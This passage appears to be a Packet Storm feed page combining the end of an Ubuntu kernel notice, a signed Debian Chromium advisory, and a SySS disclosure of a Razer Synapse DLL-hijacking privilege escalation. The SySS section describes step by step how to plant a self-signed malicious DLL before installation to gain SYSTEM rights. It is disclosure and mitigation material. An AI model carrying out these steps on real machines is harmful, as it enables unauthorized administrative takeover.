VM could possibly use this to cause a denial of service (host NIC  
availability). (CVE-2022-3643)

It was discovered that an integer overflow vulnerability existed in the  
Bluetooth subsystem in the Linux kernel. A physically proximate attacker  
could use this to cause a denial of service (system crash).  
(CVE-2022-45934)

Update instructions:

The problem can be corrected by updating your system to the following  
package versions:

Ubuntu 20.04 LTS:  
   linux-image-5.4.0-1101-azure    5.4.0-1101.107  
   linux-image-azure-lts-20.04     5.4.0.1101.94

Ubuntu 18.04 LTS:  
   linux-image-4.15.0-1126-raspi2  4.15.0-1126.134  
   linux-image-5.4.0-1101-azure    5.4.0-1101.107~18.04.1  
   linux-image-azure               5.4.0.1101.74  
   linux-image-raspi2              4.15.0.1126.121

After a standard system update you need to reboot your computer to make  
all the necessary changes.

ATTENTION: Due to an unavoidable ABI change the kernel updates have  
been given a new version number, which requires you to recompile and  
reinstall all third party kernel modules you might have installed.  
Unless you manually uninstalled the standard kernel metapackages  
(e.g. linux-generic, linux-generic-lts-RELEASE, linux-virtual,  
linux-powerpc), a standard system upgrade will automatically perform  
this as well.

References:  
   https://ubuntu.com/security/notices/USN-5830-1  
   CVE-2022-3643, CVE-2022-42896, CVE-2022-43945, CVE-2022-45934

Package Information:  
   https://launchpad.net/ubuntu/+source/linux-azure/5.4.0-1101.107  
   https://launchpad.net/ubuntu/+source/linux-azure-5.4/5.4.0-1101.107~18.04.1  
   https://launchpad.net/ubuntu/+source/linux-raspi2/4.15.0-1126.134

Ubuntu Security Notice USN-5830-1

Debian Linux Security Advisory 5328-1 - Multiple security issues were discovered in Chromium, which could result in the execution of arbitrary code, denial of service or information disclosure.

    -----BEGIN PGP SIGNED MESSAGE-----Hash: SHA512- -------------------------------------------------------------------------Debian Security Advisory DSA-5328-1                   security@debian.orghttps://www.debian.org/security/                       Moritz MuehlenhoffJanuary 26, 2023                      https://www.debian.org/security/faq- -------------------------------------------------------------------------Package        : chromiumCVE ID         : CVE-2023-0471 CVE-2023-0472 CVE-2023-0473 CVE-2023-0474Debian Bug     : 1011346Multiple security issues were discovered in Chromium, which could resultin the execution of arbitrary code, denial of service or informationdisclosure.For the stable distribution (bullseye), these problems have been fixed inversion 109.0.5414.119-1~deb11u1.We recommend that you upgrade your chromium packages.For the detailed security status of chromium please refer toits security tracker page at:https://security-tracker.debian.org/tracker/chromiumFurther information about Debian Security Advisories, how to applythese updates to your system and frequently asked questions can befound at: https://www.debian.org/security/Mailing list: debian-security-announce@lists.debian.org-----BEGIN PGP SIGNATURE-----iQIzBAEBCgAdFiEEtuYvPRKsOElcDakFEMKTtsN8TjYFAmPSxfAACgkQEMKTtsN8TjZlkQ/+PGr18MyY4Su8U78MrneB965DP5Q/faHnU/AIERZ99dkb9XkuKR7icqaUh3AdyK7fN1wz/cG/sAFa2MoFsL/tcGS0SmpZsNRdbQy6mbpYO/5yQrqW2+msvpmT/uNMCpMn9+8K2L0+yuuDCkL9KhuHZRg3UrN8T3xfkU2rebxRslvQixy9a5M8cQ+wAP4TrsKiyIRaBBrJNPE4BjKGOFYQmZn9Ov8iRMaApXgSzO7RV9ocMKbtWz5n7m6cTfpq4vOuLkugnYa/J3Xn5PozT1O8qTcru3i6CFOow/v/YEHjw2DYd42NmA+Ojon0nBPPwShPbZndJrNvloeYyrcHHf7Em330b71gtip3ri9QfenPAaJgfdJ4mIpdyDJ/rZiH4oNbkilZrlgLM4Sw/JUh2jQ8tDK2udVWyH10uYS3teGDSq/EIU3ZInKGzlez7j7ZzQuAgwTwHwwlezD4Ppr02Zuu5lvVvOSfkjE5IQnyUNb/VWGd28oN6PKq4OgMYAOPVJFPy6dvs+YR2zCJKkZBCtfeJM8lO8Ncq/gs80SKtWDibmD/lRVbVotoGoNCebFVPeoeNXgWjGb3WC6PLDBoLc/GCxqFPoNxU8y1gKi5SdcMEqLTUIjH1f8BX28c9ZZmWgpZdctavsRH5mdRgsz6kb78bWbMQYqj1sVPPufZjOF5AfQ==PFa0-----END PGP SIGNATURE-----

Debian Security Advisory 5328-1

Razer Synapse version 3.7.0731.072516 suffers from a local privilege escalation due to a DLL hijacking vulnerability.

  
Advisory ID:               SYSS-2022-047  
Product:                   Razer Synapse  
Manufacturer:              Razer Inc.  
Affected Version(s):       Versions before 3.7.0830.081906  
Tested Version(s):         3.7.0731.072516  
Vulnerability Type:        Improper Certificate Validation (CWE-295)  
Risk Level:                High  
Solution Status:           Open  
Manufacturer Notification: 2022-08-02  
Solution Date:             2022-09-06  
Public Disclosure:         2022-12-21  
CVE Reference:             CVE-2022-47632  
Author of Advisory:        Dr. Oliver Schwarz, SySS GmbH

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Overview:

Razer Synapse is an additional driver software for Razer gaming devices.  
The manufacturer describes the product as a "unified cloud-based hardware  
configuration tool" (see [1]).

Due to an unsafe installation path, improper privilege management, and  
improper certificate validation, the associated system service  
"Razer Synapse Service" is vulnerable to DLL hijacking.  
As a result, local Windows users can abuse the Razer driver installer  
to obtain administrative privileges on Windows.

In order to exploit the vulnerability, the attacker needs physical  
access to the machine and needs to prepare the attack before Razer  
Synapse is installed along with a Razer driver.

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Vulnerability Details:

The attack scenario considers a Windows machine without any previous  
installation of any Razer device or software.  
The attacker has a local unprivileged Windows account, physical access  
to the machine, and a device which is either a Razer peripheral or able  
to pretend to be one (such as a Bash Bunny or a Raspberry Pi Zero).  
The attacker aims at executing code with full system privileges.

The attack exploits the Razer Synapse Service which runs with elevated  
privileges. While the main binary of the service is stored in the  
protected location "C:\Program Files (x86)\Razer\Synapse3\Service", it  
dynamically loads libraries from  
"C:\ProgramData\Razer\Synapse3\Service\bin".  
Before the installation, standard users can write to this path, since  
"C:\ProgramData" is world-writable on a standard installation of Windows.

The Synapse installation procedure changes access privileges, so that  
standard users cannot write to the path any longer.  
However, if the path is created before the driver installation, the  
creator can set own files to be read-only and deny write access for  
the SYSTEM user.

Upon start, the Synapse service checks the location for foreign DLLs,  
removes them and aborts upon failure to delete them.  
Nevertheless, the DLL check is simply based on verifying if the DLL is  
associated with ANY certificate information. The service does not  
verify if the certificate is actually valid or belongs to Razer.

Note that the described vulnerability is similar to CVE-2021-44226,  
which has been fixed in Synapse version 3.7.0228.022817.  
The new attack differs from the original one in that the attacker  
now has to employ self-signed DLLs instead of non-signed ones.

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Proof of Concept (PoC):

The attack consists of the following steps:

1. Before the installation of the driver/Synapse, the attacker creates  
    "C:\ProgramData\Razer\Synapse3\Service", copies a custom/malicious  
    and self-signed version of userenv.dll into the directory, sets the  
    DLL to read-only, and denies write access for SYSTEM.

2. Afterwards, the attacker triggers the installation of Synapse.  
    This can be done without any elevated privileges by plugging in a  
    Razer device and following the installation procedure for Synapse  
    if device-specific co-installers are not disabled.  
    Alternatively, a device such as Bash Bunny or a Raspberry Pi Zero  
    can be used and pretend to be a Razer device.

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Solution:

Razer has published a patched version that will be deployed automatically  
upon driver installation on current Windows builds.

To prevent similar attacks through other co-installers, system  
administrators can disable them by setting the following key in the  
Windows registry:

HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Device   
Installer\DisableCoInstallers = 1

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Disclosure Timeline:

2022-06-02: Vulnerability discovered  
2022-08-02: Vulnerability reported to manufacturer  
2022-09-06: Patch released by manufacturer  
2022-12-21: Public disclosure of vulnerability

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

References:

[1] Product website for Razer Synapse 3  
     https://www2.razer.com/eu-en/synapse-3  
[2] SySS Security Advisory SYSS-2022-047

 https://www.syss.de/fileadmin/dokumente/Publikationen/Advisories/SYSS-2022-047.txt  
[3] SySS Responsible Disclosure Policy  
     https://www.syss.de/en/responsible-disclosure-policy

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Credits:

This security vulnerability was found by Dr. Oliver Schwarz of SySS GmbH.

E-Mail: oliver.schwarz@syss.de  
Public Key:   
https://www.syss.de/fileadmin/dokumente/PGPKeys/Oliver_Schwarz.asc  
Key ID: 0x9716294F1294280D  
Key Fingerprint: D452 B014 E992 2886 E799 6B43 9716 294F 1294 280D

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Disclaimer:

The information provided in this security advisory is provided "as is"  
and without warranty of any kind. Details of this security advisory may  
be updated in order to provide as accurate information as possible. The  
latest version of this security advisory is available on the SySS website.

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Copyright:

Creative Commons - Attribution (by) - Version 3.0  
URL: http://creativecommons.org/licenses/by/3.0/deed.en

Source

Packet Storm